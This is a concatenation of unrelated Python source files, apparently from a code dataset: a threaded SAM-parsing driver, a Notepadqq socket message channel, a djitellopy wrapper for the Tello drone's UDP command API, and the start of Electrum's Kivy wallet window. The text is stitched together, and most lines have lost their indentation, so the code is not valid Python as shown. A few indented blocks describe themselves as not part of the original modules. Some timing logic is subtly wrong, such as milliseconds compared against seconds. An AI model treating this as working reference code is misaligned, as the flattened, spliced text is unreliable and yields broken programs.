reads_files[thread_idx].close()
reads_file.close()
##############################
threads_list = []
for thread_idx in range(num_threads):
cmd = (python_path + " " + bin_path + 'parseSAM.py ' + regions_filename + ' ' + reads_filename + '.' + str(thread_idx) +
' ' + output_filename + '.' + str(thread_idx) + ' ' + read_len + ' ' + min_junction_overlap_len)
        print(cmd)
threads_list.append( threading.Thread(target=os.system, args=(cmd,)) )
threads_list[thread_idx].start()
for thread in threads_list:
thread.join()
output_file = open(output_filename, 'w')
output_files = []
header = 0
for thread_idx in range(num_threads):
output_files.append(open(output_filename + '.' + str(thread_idx), 'r'))
header += int(output_files[thread_idx].readline())
output_file.write(str(header) + '\n')
genes_str_map = {}
genes_reads_count_map = {}
for thread_idx in range(num_threads):
while True:
line = output_files[thread_idx].readline()
if (line == ''):
break
            if line not in genes_str_map:
lines = line
isoforms_line = output_files[thread_idx].readline()
lines += isoforms_line
for i in range(4):
lines += output_files[thread_idx].readline()
for i in range(len(isoforms_line.split())):
lines += output_files[thread_idx].readline()
lines += output_files[thread_idx].readline()
genes_reads_count_map[line] = [int(i) for i in output_files[thread_idx].readline().split()]
genes_str_map[line] = lines
else:
isoforms_line = output_files[thread_idx].readline()
for i in range(4):
output_files[thread_idx].readline()
for i in range(len(isoforms_line.split())):
output_files[thread_idx].readline()
output_files[thread_idx].readline()
reads_count_line = [int(i) for i in output_files[thread_idx].readline().split()]
for i in range(len(reads_count_line)):
genes_reads_count_map[line][i] += reads_count_line[i]
genes = sorted(genes_str_map.keys())
for gene in genes:
output_file.write(genes_str_map[gene])
for i in range(len(genes_reads_count_map[gene])):
output_file.write(str(genes_reads_count_map[gene][i]).ljust(20))
output_file.write('\n')
for thread_idx in range(num_threads):
output_files[thread_idx].close()
rm_cmnd = "rm " + output_filename + '.' + str(thread_idx) + ' ' + reads_filename + '.' + str(thread_idx)
os.system(rm_cmnd)
output_file.close()
if __name__ == '__main__':
main()
|
message_channel.py
|
import logging
import socket
import json
import threading
import asyncio
class MessageChannel():
"""Send messages to Notepadqq and receive responses."""
def __init__(self, socket_path):
"""Initialize a new channel on the specified address."""
# FIXME Windows support
self._logger = logging.getLogger('MessageChannel')
self._socket_path = socket_path
self._unprocessed_messages = []
# Condition variable for self._unprocessed_messages
self._readCondition = threading.Condition()
# Used to wake up the main thread event loop whenever new messages
# are available.
self._notifyRead, self._notifyWrite = None, None
# Socket for communication with Notepadqq
self._socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._socket.setblocking(True)
def start(self, loop, handler_callback):
"""Connect to the socket and start reading data. The passed callback
will be called for each new incoming message.
"""
self._notifyRead, self._notifyWrite = socket.socketpair()
self._socket.connect(self._socket_path)
# Get a stream reader for the notification socket
notifyReader, _ = yield from asyncio.open_connection(sock=self._notifyRead, loop=loop)
# Start the thread that will receive messages from the socket.
t = threading.Thread(target=self._fill_buffer)
t.start()
while True:
# Asynchronously wait for new messages
yield from notifyReader.read(4096)
while True:
with self._readCondition:
if len(self._unprocessed_messages) > 0:
# Get the first message
data = self._unprocessed_messages.pop(0)
else:
break # from the inner while
# Call the handler
handler_callback(json.loads(data.decode()))
def send_message(self, msg):
"""Sends a JSON message to Notepadqq."""
self._send_raw_message(json.dumps(msg) + "\n")
def get_next_result_message(self):
"""Synchronously wait and return the next result message."""
# FIXME Get next result message with the specified request id, and
# in the meantime keep handling the messages that are not the requested one.
retval = None
while retval is None:
with self._readCondition:
# Look in self._unprocessed_messages for our result message.
# Just for safety, we cycle again on each message even if we
# already checked it in the previous iteration. Nobody should
# read from self._unprocessed_messages while we're running this
# function, but you never know who may pop the data.
for i in range(0, len(self._unprocessed_messages)):
received_message = json.loads(self._unprocessed_messages[i].decode())
if "result" in received_message:
del self._unprocessed_messages[i]
retval = received_message
break # from the for
if retval is None:
# Synchronously wait for new messages
self._readCondition.wait()
return retval
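    # Illustrative call pattern (the message fields below are hypothetical,
    # not taken from the Notepadqq protocol): a caller typically sends a
    # request with send_message() and then blocks on
    # get_next_result_message() until a reply containing a "result" key
    # arrives, e.g.
    #
    #   channel.send_message({"id": 1, "method": "someMethod", "args": []})
    #   reply = channel.get_next_result_message()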
def _send_raw_message(self, msg):
# Send a raw string message to Notepadqq.
data = msg.encode()
self._socket.send(data)
self._logger.debug(">> Sent " + str(data))
def _fill_buffer(self):
# This should run in a different thread. It reads messages from the
# channel and puts them in self._unprocessed_messages.
buf = b''
while True:
buf += self._socket.recv(4096)
parts = buf.split(b'\n')
# The last element is always partial.
buf = parts.pop()
# Print received data for debug
if self._logger.getEffectiveLevel() == logging.DEBUG:
for p in parts:
self._logger.debug("<< Received " + str(p))
with self._readCondition:
self._unprocessed_messages.extend(parts)
# Notify whoever is blocked waiting for new messages
# (e.g. self.get_next_result_message)
self._readCondition.notify()
# Notify event loop (e.g. unlock self.start)
self._notifyWrite.send(b'.')
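if __name__ == '__main__':
    # Minimal sketch, not part of the original module: it assumes a
    # Notepadqq-style server is listening on the (hypothetical) socket path
    # below, and that the running Python/asyncio version still accepts
    # generator-based coroutines such as MessageChannel.start().
    def handler(msg):
        print("received:", msg)

    loop = asyncio.get_event_loop()
    channel = MessageChannel('/tmp/notepadqq_example.sock')  # hypothetical path
    loop.run_until_complete(channel.start(loop, handler))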
|
tello.py
|
# coding=utf-8
import logging
import socket
import time
import threading
import queue
import cv2
import numpy as np
from threading import Thread
from djitellopy.decorators import accepts
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf
"""
# Send and receive commands, client socket
UDP_IP = '192.168.10.1'
UDP_PORT = 8889
RESPONSE_TIMEOUT = 7 # in seconds
TIMEOUT_WO_LOG = 0.5
TIME_BTW_COMMANDS = 1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds
RETRY_COUNT = 3
last_received_command = time.time()
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('%(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# use logging.getLogger('djitellopy').setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
# State stream, server socket
SS_UDP_IP = '0.0.0.0'
SS_UDP_PORT = 8890
# VideoCapture object
cap = None
background_frame_read = None
# DroneState object
background_data_read = None
stream_on = False
def __init__(self, data_queue,
host='192.168.10.1',
port=8889,
client_socket=None,
enable_exceptions=False,
retry_count=3):
self.data_queue = data_queue
self.address = (host, port)
self.response = None
self.state = None
self.stream_on = False
self.enable_exceptions = enable_exceptions
self.retry_count = retry_count
if client_socket:
self.clientSocket = client_socket
else:
self.clientSocket = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.clientSocket.bind(('', self.UDP_PORT)) # For UDP response (receiving data)
self.stateSocket = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.stateSocket.bind((self.SS_UDP_IP, self.SS_UDP_PORT))
self.stateSocket.settimeout(10)
# Run tello udp receiver on background
thread = threading.Thread(target=self.run_udp_receiver, args=())
thread.daemon = True
thread.start()
        # Run tello state receiver in the background
thread_st = threading.Thread(target=self.get_read_state, args=())
thread_st.daemon = True
thread_st.start()
def run_udp_receiver(self):
"""Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread
in order to not block the main thread."""
while True:
try:
self.response, _ = self.clientSocket.recvfrom(1024) # buffer size is 1024 bytes
except Exception as e:
self.LOGGER.error(e)
break
def get_udp_state_address(self):
return 'udp://@' + self.SS_UDP_IP + ':' + str(self.SS_UDP_PORT)
def get_read_state(self):
"""Get the states from the drone.
(pitch:%d;roll:%d;yaw:%d;vgx:%d;vgy%d;vgz:%d;templ:%d;temph:%d;tof:%d;h:%d;bat:%d;
baro:%.2f; time:%d;agx:%.2f;agy:%.2f;agz:%.2f;\r\n)
- pitch: Attitude pitch, degree
- roll: Attitude roll, degree
- yaw: Attitude yaw, degree
- vgx: Speed x,
- vgy: Speed y,
- vgz: Speed z,
        - templ: Lowest temperature, celsius degrees
        - temph: Highest temperature, celsius degrees
- tof: TOF distance, cm
- h: Height, cm
- bat: Current battery percentage, %
- baro: Barometer measurement, cm
- time: Motors on time,
- agx: Acceleration x,
- agy: Acceleration y,
- agz: Acceleration z,
Returns: string
"""
while True:
time.sleep(1/25)
try:
state_temp, _ = self.stateSocket.recvfrom(1024) # buffer size is 1024 bytes
self.state = state_temp.decode('ASCII').split(";")
# print(self.state)
# convert to right hand system
pitch = -int(self.state[0][self.state[0].index(":")+1:])
roll = -int(self.state[1][self.state[1].index(":")+1:])
yaw = -int(self.state[2][self.state[2].index(":")+1:])
# tof height
                tof = int(self.state[8][self.state[8].index(":")+1:])
# battery percentage
bat = int(self.state[10][self.state[10].index(":")+1:])
#print("tello "+str([pitch, roll, yaw, tof, bat]))
self.data_queue.put([pitch, roll, yaw, tof, bat])
except Exception as e:
self.LOGGER.error(e)
break
def get_udp_video_address(self):
return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self):
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
@accepts(command=str)
def send_command_with_return(self, command):
"""Send command to Tello and wait for its response.
Return:
bool: True for successful, False for unsuccessful
"""
        # Commands sent in quick succession can make the drone unresponsive, so wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
self.LOGGER.info('Send command: ' + command)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > self.RESPONSE_TIMEOUT * 1000:
self.LOGGER.warning('Timeout exceed on command ' + command)
return False
response = self.response.decode('utf-8').rstrip("\r\n")
self.LOGGER.info('Response: ' + response)
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_command_without_return(self, command):
"""Send command to Tello without expecting a response. Use this method when you want to send a command
continuously
- go x y z speed: Tello fly to x y z in speed (cm/s)
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
- curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with
            speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responds false.
            x/y/z can’t be between -20 and 20 at the same time.
x1, x2: 20-500
y1, y2: 20-500
z1, z2: 20-500
speed: 10-60
- rc a b c d: Send RC control via four channels.
a: left/right (-100~100)
b: forward/backward (-100~100)
c: up/down (-100~100)
d: yaw (-100~100)
"""
        # Commands sent in quick succession can make the drone unresponsive, so wait at least self.TIME_BTW_COMMANDS seconds
#self.LOGGER.info('Send command (no expect response): ' + command)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
@accepts(command=str)
def send_control_command(self, command):
"""Send control command to Tello and wait for its response. Possible control commands:
- command: entry SDK mode
- takeoff: Tello auto takeoff
- land: Tello auto land
- streamon: Set video stream on
- streamoff: Set video stream off
- emergency: Stop all motors immediately
- up x: Tello fly up with distance x cm. x: 20-500
- down x: Tello fly down with distance x cm. x: 20-500
- left x: Tello fly left with distance x cm. x: 20-500
- right x: Tello fly right with distance x cm. x: 20-500
- forward x: Tello fly forward with distance x cm. x: 20-500
- back x: Tello fly back with distance x cm. x: 20-500
- cw x: Tello rotate x degree clockwise x: 1-3600
- ccw x: Tello rotate x degree counter- clockwise. x: 1-3600
- flip x: Tello fly flip x
l (left)
r (right)
f (forward)
b (back)
- speed x: set speed to x cm/s. x: 10-100
- wifi ssid pass: Set Wi-Fi with SSID password
Return:
bool: True for successful, False for unsuccessful
"""
for i in range(0, self.retry_count):
response = self.send_command_with_return(command)
if response == 'OK' or response == 'ok':
return True
return self.return_error_on_send_command(command, response, self.enable_exceptions)
@accepts(command=str)
def send_read_command(self, command):
"""Send set command to Tello and wait for its response. Possible set commands:
- speed?: get current speed (cm/s): x: 1-100
- battery?: get current battery percentage: x: 0-100
- time?: get current fly time (s): time
- height?: get height (cm): x: 0-3000
- temp?: get temperature (°C): x: 0-90
- acceleration?: get IMU acceleration data (0.001g): x y z
- attitude?: get IMU attitude data: pitch roll yaw
- baro?: get barometer value (m): x
- tof?: get distance value from TOF (cm): x: 30-1000
- wifi?: get Wi-Fi SNR: snr
Return:
            int/str: parsed response value, False for unsuccessful
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
if response.isdigit():
return int(response)
else:
return response
else:
return self.return_error_on_send_command(command, response, self.enable_exceptions)
@accepts(command=str)
def send_command_with_return_wo_log(self, command):
"""Send command to Tello and wait for its response, w/o logging.
Return:
bool: True for successful, False for unsuccessful
"""
        # Commands sent in quick succession can make the drone unresponsive, so wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > self.TIMEOUT_WO_LOG * 1000:
self.LOGGER.warning('Timeout exceed on command ' + command)
return False
response = self.response.decode('utf-8').rstrip("\r\n")
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_read_command_wo_log(self, command):
"""Send set command to Tello and wait for its response, w/o logging.
Return:
bool: True for successful, False for unsuccessful
"""
response = self.send_command_with_return_wo_log(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
if response.isdigit():
return int(response)
else:
return response
else:
return self.return_error_on_send_command(command, response, self.enable_exceptions)
@staticmethod
def return_error_on_send_command(command, response, enable_exceptions):
"""Returns False and print an informative result code to show unsuccessful response"""
msg = 'Command ' + command + ' was unsuccessful. Message: ' + str(response)
if enable_exceptions:
raise Exception(msg)
else:
#self.LOGGER.error(msg)
return False
def connect(self):
"""Entry SDK mode
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("command")
def takeoff(self):
"""Tello auto takeoff
Returns:
bool: True for successful, False for unsuccessful
False: Unsuccessful
"""
return self.send_control_command("takeoff")
def land(self):
"""Tello auto land
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("land")
def streamon(self):
"""Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That
can be done through the Tello app.
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamon")
if result is True:
self.stream_on = True
return result
def streamoff(self):
"""Set video stream off
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamoff")
if result is True:
self.stream_on = False
return result
def emergency(self):
"""Stop all motors immediately
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("emergency")
@accepts(direction=str, x=int)
def move(self, direction, x):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(direction + ' ' + str(x))
@accepts(x=int)
def move_up(self, x):
"""Tello fly up with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("up", x)
@accepts(x=int)
def move_down(self, x):
"""Tello fly down with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("down", x)
@accepts(x=int)
def move_left(self, x):
"""Tello fly left with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("left", x)
@accepts(x=int)
def move_right(self, x):
"""Tello fly right with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("right", x)
@accepts(x=int)
def move_forward(self, x):
"""Tello fly forward with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("forward", x)
@accepts(x=int)
def move_back(self, x):
"""Tello fly back with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("back", x)
@accepts(x=int)
def rotate_clockwise(self, x):
"""Tello rotate x degree clockwise.
Arguments:
x: 1-360
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("cw " + str(x))
@accepts(x=int)
def rotate_counter_clockwise(self, x):
"""Tello rotate x degree counter-clockwise.
Arguments:
x: 1-3600
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("ccw " + str(x))
@accepts(x=str)
def flip(self, direction):
"""Tello fly flip.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("flip " + direction)
def flip_left(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("l")
def flip_right(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("r")
def flip_forward(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("f")
def flip_back(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("b")
@accepts(x=int, y=int, z=int, speed=int)
def go_xyz_speed(self, x, y, z, speed):
"""Tello fly to x y z in speed (cm/s)
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('go %s %s %s %s' % (x, y, z, speed))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int)
def curve_xyz_speed(self, x1, y1, z1, x2, y2, z2, speed):
"""Tello fly a curve defined by the current and two given coordinates with speed (cm/s).
        - If the arc radius is not within the range of 0.5-10 meters, it responds false.
        - x/y/z can’t be between -20 and 20 at the same time.
Arguments:
x1: 20-500
x2: 20-500
y1: 20-500
y2: 20-500
z1: 20-500
z2: 20-500
speed: 10-60
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
@accepts(x=int, y=int, z=int, speed=int, mid=int)
def go_xyz_speed_mid(self, x, y, z, speed, mid):
"""Tello fly to x y z in speed (cm/s) relative to mission pad with id mid
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('go %s %s %s %s m%s' % (x, y, z, speed, mid))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int, mid=int)
def curve_xyz_speed_mid(self, x1, y1, z1, x2, y2, z2, speed, mid):
"""Tello fly to x2 y2 z2 over x1 y1 z1 in speed (cm/s) relative to mission pad with id mid
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('curve %s %s %s %s %s %s %s m%s' % (x1, y1, z1, x2, y2, z2, speed, mid))
@accepts(x=int, y=int, z=int, speed=int, yaw=int, mid1=int, mid2=int)
def go_xyz_speed_yaw_mid(self, x, y, z, speed, yaw, mid1, mid2):
"""Tello fly to x y z in speed (cm/s) relative to mid1
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2))
def enable_mission_pads(self):
return self.send_control_command("mon")
def disable_mission_pads(self):
return self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
return self.send_control_command("mdirection " + str(x))
@accepts(x=int)
def set_speed(self, x):
"""Set speed to x cm/s.
Arguments:
x: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("speed " + str(x))
last_rc_control_sent = 0
@accepts(left_right_velocity=int, forward_backward_velocity=int, up_down_velocity=int, yaw_velocity=int)
def send_rc_control(self, left_right_velocity, forward_backward_velocity, up_down_velocity, yaw_velocity):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
Returns:
bool: True for successful, False for unsuccessful
"""
if int(time.time() * 1000) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS:
pass
else:
self.last_rc_control_sent = int(time.time() * 1000)
return self.send_command_without_return('rc %s %s %s %s' % (left_right_velocity, forward_backward_velocity,
up_down_velocity, yaw_velocity))
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('wifi %s %s' % (ssid, password))
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('ap %s %s' % (ssid, password))
def get_speed(self):
"""Get current speed (cm/s)
Returns:
False: Unsuccessful
int: 1-100
"""
return self.send_read_command('speed?')
def get_battery(self):
"""Get current battery percentage
Returns:
False: Unsuccessful
            int: 0-100
"""
return self.send_read_command('battery?')
def get_flight_time(self):
"""Get current fly time (s)
Returns:
False: Unsuccessful
int: Seconds elapsed during flight.
"""
return self.send_read_command('time?')
def get_height(self):
"""Get height (cm)
Returns:
False: Unsuccessful
int: 0-3000
"""
return self.send_read_command('height?')
def get_temperature(self):
"""Get temperature (°C)
Returns:
False: Unsuccessful
int: 0-90
"""
return self.send_read_command('temp?')
def get_attitude(self):
"""Get IMU attitude data
Returns:
False: Unsuccessful
int: pitch roll yaw
"""
return self.send_read_command('attitude?')
def get_barometer(self):
"""Get barometer value (m)
Returns:
False: Unsuccessful
int: 0-100
"""
return self.send_read_command('baro?')
def get_distance_tof(self):
"""Get distance value from TOF (cm)
Returns:
False: Unsuccessful
int: 30-1000
"""
return self.send_read_command('tof?')
def get_wifi(self):
"""Get Wi-Fi SNR
Returns:
False: Unsuccessful
str: snr
"""
return self.send_read_command('wifi?')
def get_sdk_version(self):
"""Get SDK Version
Returns:
False: Unsuccessful
str: SDK Version
"""
return self.send_read_command('sdk?')
def get_serial_number(self):
"""Get Serial Number
Returns:
False: Unsuccessful
str: Serial Number
"""
return self.send_read_command('sn?')
def end(self):
"""Call this method when you want to end the tello object"""
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
class BackgroundFrameRead:
"""
    This class reads frames from a VideoCapture in the background. Just call
    backgroundFrameRead.frame to get the most recent frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
def start(self):
Thread(target=self.update_frame, args=()).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
(self.grabbed, self.frame) = self.cap.read()
def stop(self):
self.stopped = True
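if __name__ == '__main__':
    # Minimal sketch, not part of the original module: a short scripted flight
    # using this wrapper. It assumes the computer is already connected to the
    # drone's Wi-Fi network; the distances and angle below are arbitrary.
    state_queue = queue.Queue()
    drone = Tello(state_queue)
    if drone.connect():
        drone.takeoff()
        drone.move_up(50)
        drone.rotate_clockwise(90)
        drone.land()
    drone.end()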
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# Register the widget cache to keep memory usage down; timeout=0 keeps the
# cached data forever.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
